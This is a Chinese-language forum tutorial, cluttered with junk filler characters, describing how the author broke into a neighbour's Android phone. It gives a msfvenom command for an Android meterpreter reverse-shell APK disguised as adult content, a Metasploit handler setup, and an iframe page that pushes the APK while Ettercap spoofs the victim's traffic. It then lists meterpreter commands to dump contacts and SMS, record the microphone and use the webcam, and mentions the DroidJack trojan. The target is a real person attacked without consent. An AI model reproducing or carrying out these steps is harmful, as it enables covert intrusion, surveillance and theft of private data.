* ]& z n% q. h9 |: B 五、msf+ettercap入侵邻居安卓手机 1 L# M5 m6 B5 @# [/ X2 T
2 [# V" v3 }( O, P& ~- X
8 j. H4 \$ R$ a, q, N 首先启动msf $ \; `4 _, H5 F% t' l# j/ i2 P
( E. J: ^! N2 j7 Y! [$ O2 J1 e, @1 x9 N7 R# S- X# E. I1 @
先用kali生成一个安卓木马,如下命令: 6 u4 G# n( V X3 j; v
- I: Z3 w3 Y+ G. u3 n8 P# S' n* t' ]7 [7 g* ?% `1 }' v
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
* i6 }- G- m% @1 f4 |9 J" A8 x
3 a1 V, A' k5 O
5 ~3 P) P: z U& D) o" E+ K 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
3 }( |; e e3 y. e
8 y D# A# T( q. t: r7 L% m/ x# o8 c c
然后进入msf ! G6 o5 C ~! T% O/ W3 |- Q" e
& y$ \" z Y2 ?& x, D, i
6 r7 \, e4 ~9 ]' \8 Q. g# A use exploit/multi/handler
. h& }, u7 K" \; o: K- U* d, B/ ]
9 L% H' w# P L9 v3 q. M6 b: ^& X; Z
set payload android/meterpreter/reverse_tcp ! N! X' p, ~' I7 I! A* O
B w5 _* Y/ ^7 l6 Q9 Q# }2 N, X# f$ j
set LHOST 192.168.0.109 //ip为kaili的ip
) N- Y2 v6 x, a. h - l# p1 w2 {$ T. M
0 z+ H6 x0 n, k: y# z3 R9 u; S
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
/ m2 y I5 Q, q8 o# L! r- A( ?& Z 1 S% L# p: \) @6 x) q
$ `. r. A# x4 ~" L6 m. `3 { Exploit
& X D5 J7 Z; l- V2 T0 d+ d6 ]9 v) M
3 o, X" ~0 W0 R* C' C+ l3 N+ |' b0 i, W/ C2 H- Y+ M" }6 e
4 U4 a% h3 r; N4 O ' O- ~# m7 Z) m: u* x$ }
+ J( S7 E& [2 F' n2 f" M" g 下面我们开启ettercap -G ; v1 Z5 y/ M+ b; A/ L# J/ ]+ l
1 n8 W# r0 b* d2 J* L/ `% h% z9 ~
# A) W7 ^0 R0 f5 J7 o
我物理IP为
. G# m4 q: a- c . i k4 w/ W0 \' L V9 j
2 }/ x' s8 S$ Z& h
$ Q( z0 B; ]- F9 M+ r; k
; B( T# ]- [; _$ k
( `! v6 }! C* k( @5 Z+ ]2 M3 ] 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
5 G/ R7 c t8 N8 \) Y [! F* j; \ ( j2 w O8 c" ~: I& w# M" e+ I2 Q
5 l4 h% R$ h' D' T. r( I
下面我们来设置一下 . l b3 h1 P9 f
3 l" k: B9 @0 ?+ G
2 I {( q" F$ u* c: J* Z ; j* P3 y e# r9 \2 [
( i8 V! c7 A8 H1 t1 ?! j: U2 n. j* y+ S
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
R* O6 ~, C* z* E; Q ' A' T W1 U/ e. Y- @
- e i, M2 e9 s2 m/ }5 y
0 L5 {: }5 _+ L" D$ @$ h5 v1 q . g; v2 i& P1 g; |5 x
* v4 W) p, i. X m5 b) j( l9 B! {
8 c3 Q: `# Y2 c# D% G / j) s- k$ D4 z" B
& B; C: i( M! S( ? ; a: T4 P7 ?# v9 d
- {1 ?0 {2 U( _
9 N! A' l6 H$ \! ?8 Q- g9 R1 n/ u
& L# _5 j$ R8 h. A- O! o D6 E3 H/ T
. U4 F, e+ Y2 e0 [& p7 g1 C4 [) v
! I* F' }+ {+ _% i. w) o1 a9 P0 y
. W% t2 r9 C. H: G! D+ A: J- v6 y# O! V" g. M& n
$ j: W* u; { {# h! c7 U
V+ w; A0 V8 g6 O9 {2 w5 M: D$ X8 R
! O' b3 o: o/ _+ n6 u( A ' j3 s. ?. e4 j, U3 I0 c
4 f9 t: E; f8 v
3 t! T1 }; g A
3 a0 F" b1 }! N# f5 s; p: q; _7 x! M: O3 W1 S" Y
3 C1 E4 g/ z, `* z: r- Q1 e6 g
8 v. z3 i6 f' m/ _
0 f7 Z' {& u/ K- N t- o3 G& C 8 i/ c0 J, l: H; A) F3 B2 e3 b
; [" s+ o" }0 ]6 x; @, L! z
9 h$ P7 w! C# u) z " h4 x: l3 [: |3 b! C. l
0 n$ P9 |- }' q+ ]' d4 v
* `1 G4 A, r% e( V2 D l
( `8 I+ U* f. [5 D2 Z. X' F- c6 \' ~
, [0 T' U) s$ R# v9 J# V
$ a- J) w; E- w) o. e' n7 W3 m* X6 r
' q( p$ H/ q1 b0 ^1 }1 ?
* E) b P( w/ M, {$ |& X: Y
- _1 M8 G) { Z! ^/ w& v 下面我们开始攻击
- y$ i5 t3 C ]& Z# K
* @1 I8 q2 t; b4 ~9 C0 [4 C. [% j0 V2 o+ k+ J8 k
% X* O0 z% ^. a' T
! o& e; k$ L, q5 u' g' Z1 U1 \9 o) W) M
: j2 p0 T/ j$ M2 N
: N, v/ s, d# j: e G8 Q+ ^& i
6 P H0 Y9 M/ v
7 I/ ?: q) k$ U8 z n( m4 p 0 G0 b. f( y; K9 G! c* z7 j) u9 t* m
! E4 @1 z( k* J- a+ q9 B
7 q! t9 V: V } 3 b+ t& a5 x0 d. [1 G
8 w. x( P; S, i& W1 d
0 @# M3 n4 |5 v- D. l/ \5 l 8 |" `( Y3 V2 }) E
! n( K9 A4 @* x9 b( }5 Z
大概过了5分钟多,发现反弹成功了
* F+ ~" s7 Z& ] % Q0 Z9 Q8 R. y- X# a* e$ f
0 Z1 h2 i, k M/ p: y $ R P1 C6 m0 `, i% _
3 m. H) }! i2 @% ^
& \9 i. A3 G. w7 g# _! |3 w
' o' J& [! ?0 X4 r: T* v
: ?8 S- o" a g" {% b% l# z- ~+ K/ J _. U7 X' \
4 G: P0 r" V" Z: c % L1 E5 z3 }2 [( L2 K
3 f7 u3 x4 z0 ^- Q1 v
: e- y& H+ H0 U" i9 |
7 M- K5 g' w4 i8 S- n( m: T) ]
- U( U- m0 r- Y X ; K) Q/ b- T0 q5 G$ y' d5 N
3 e- Y8 P+ h$ S a
5 A) Z& Q6 S: h3 S7 O" r
- q9 Z& B( H" C2 _/ D* r. h
S2 {$ F; D2 a9 N$ A+ C! S1 a1 Q2 x. s/ E! x) H) o u+ U
3 i3 G1 k1 ]$ e; o
3 D1 F. g2 N' N9 c6 t4 R6 p4 U; A1 m! n- b( r6 j2 q7 L, V
执行命令 " u' k: [ _' y+ X) E
4 C( d: K& z$ n3 ?9 F( V- l
1 I/ s! Z q/ q& J7 I$ @ C5 j1 P& _# o, u
. J1 {; N- b* M" e# A& M/ w0 b" y; z& x1 J ~" g' }* K0 U
dump_contacts --》这个是导出电话 : D; g* j# z* ~+ Y
W) D* ~6 t2 _: Q% q: C6 e
9 s( h9 t; |1 U. w& w; @0 F+ N; d4 Y
dump_sms --》这个是导出信息 & f7 S. [2 w3 I. `, a3 Z6 b
% G9 {8 s, _! R' @4 Z! q- ~
, ]. i' j; h2 F+ m
record_mic Record audio from the default microphone for X seconds 0 k3 N8 m! c- B' T7 C- [
0 }. l9 C9 v8 J
7 ^% Z4 ^: x7 H% G: P webcam_chat Start a video chat
$ ~5 i' D; m+ e $ _ Z" ]- w2 |8 W7 {- }8 L
$ y7 j- H; P0 F {2 ~4 R. A' S webcam_list List webcams
) o) Q. o8 u9 h2 I" P5 q ! f% Z7 _' z3 N' b( v
; Y- A( X) @6 O \ webcam_snap Take a snapshot from the specified webcam
/ c$ ?8 c8 D6 H a ; V. {) Q. k' J4 p. J
, J9 {' c' t; X& J P! {6 s0 \! ?& A1 R webcam_stream  lay a video stream from the specified webcam
j* h/ \: \; I; F. |0 B- J , l4 w* ]& U, \
9 V, i' G& M1 K% ] [
; r' A7 |; O* w/ N; n& K$ n
3 M5 v _# l2 e, t7 X6 l8 `
" r* `# ^/ h; ^' j- [) E0 e/ {* w
+ p; [( U. T7 j+ D/ ?6 f0 f0 z: J# y 0 a) C+ o' O* _
/ y1 V7 `/ r* v% t2 q# [. i5 a
我们打开看一下电话薄, - t2 D$ Q4 U) |: g% o& b a
& U! F: }1 y, o' Z! d# q3 ?% i
2 T' f8 F6 k1 g! n
# S' k! `; C! q2 s
3 k4 }6 d9 x1 u% Q( _# p. R' a+ z$ Z. D9 C1 m% X/ Z) @
4 a: M4 B# q4 Z: t, g0 l
4 a3 }! q' D* ~/ B" Y4 f# y5 P2 O' `; G7 c
; A1 u9 D. v; G; A H4 I
8 {" c! A ?' h3 X/ z5 x0 A' _
7 \& f& l# n# x4 L; @! B1 C7 b: d2 V ! w. }2 L: l6 {( ]
) \8 t" J. D$ e0 G7 |( i
) ~$ e# W3 R( i
9 |' W4 ~% T0 Q
9 j3 B) |/ X: V) M X+ I, x: Q$ u/ _
) H5 I3 D6 V3 J
+ G6 k D9 t- H; {# x. a% r! B6 A% n9 j$ J$ m9 b9 _" D
我们同时欺骗成DroidJack木马,使用方法如图:
% M' m+ f. |$ v M+ Z8 j 2 H5 I6 k6 L& l( B7 {, ?; j, B
- S3 n0 G7 ?) a2 c; g1 H v
, w9 K" l2 ~" M5 E9 `+ z
Y" y' s; f/ v, s9 r5 ~' n# A; o9 B% _& I2 Y$ B
+ U$ t7 L. V; H5 A y4 P$ k # t" O' N+ x: Q/ e4 F5 e
- n: {" O5 @/ D6 Z8 C+ R) S; y" r
' T) ]1 \* ], G y( a' z7 _5 H' M % K3 l, p4 ~9 i# h d/ t5 a
1 L3 W5 p' y$ u" p# O9 r. i 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
8 w/ ^# h+ T! b: O8 y$ T) f6 r 4 e( p: j% K& k8 m
/ Q) U2 r& ^/ `- `" C5 p( c/ u8 Z
) r6 y, U$ z- G7 b
* `' N# X0 s1 }7 Y" X1 i9 Y3 e( f; i. c9 g9 A7 @" x$ b6 @0 G
- z& ]9 ]$ v8 D. R* v2 J
+ `: n" d! G# O
/ g; \, s% N! A# x8 V+ q7 S5 f1 M. ~ ( x" @! a- Q9 t& S, ~
) `3 |' m* i. W6 i1 W
# h4 v/ D$ c: K. |# s3 A( E) ~, U 8 u0 k+ `) s+ V) Z5 U5 N+ ^
/ ?# x2 |1 i: v! T$ x8 `4 k' Y$ y7 H9 T, b' U
$ q) o" K/ ^: _+ w
|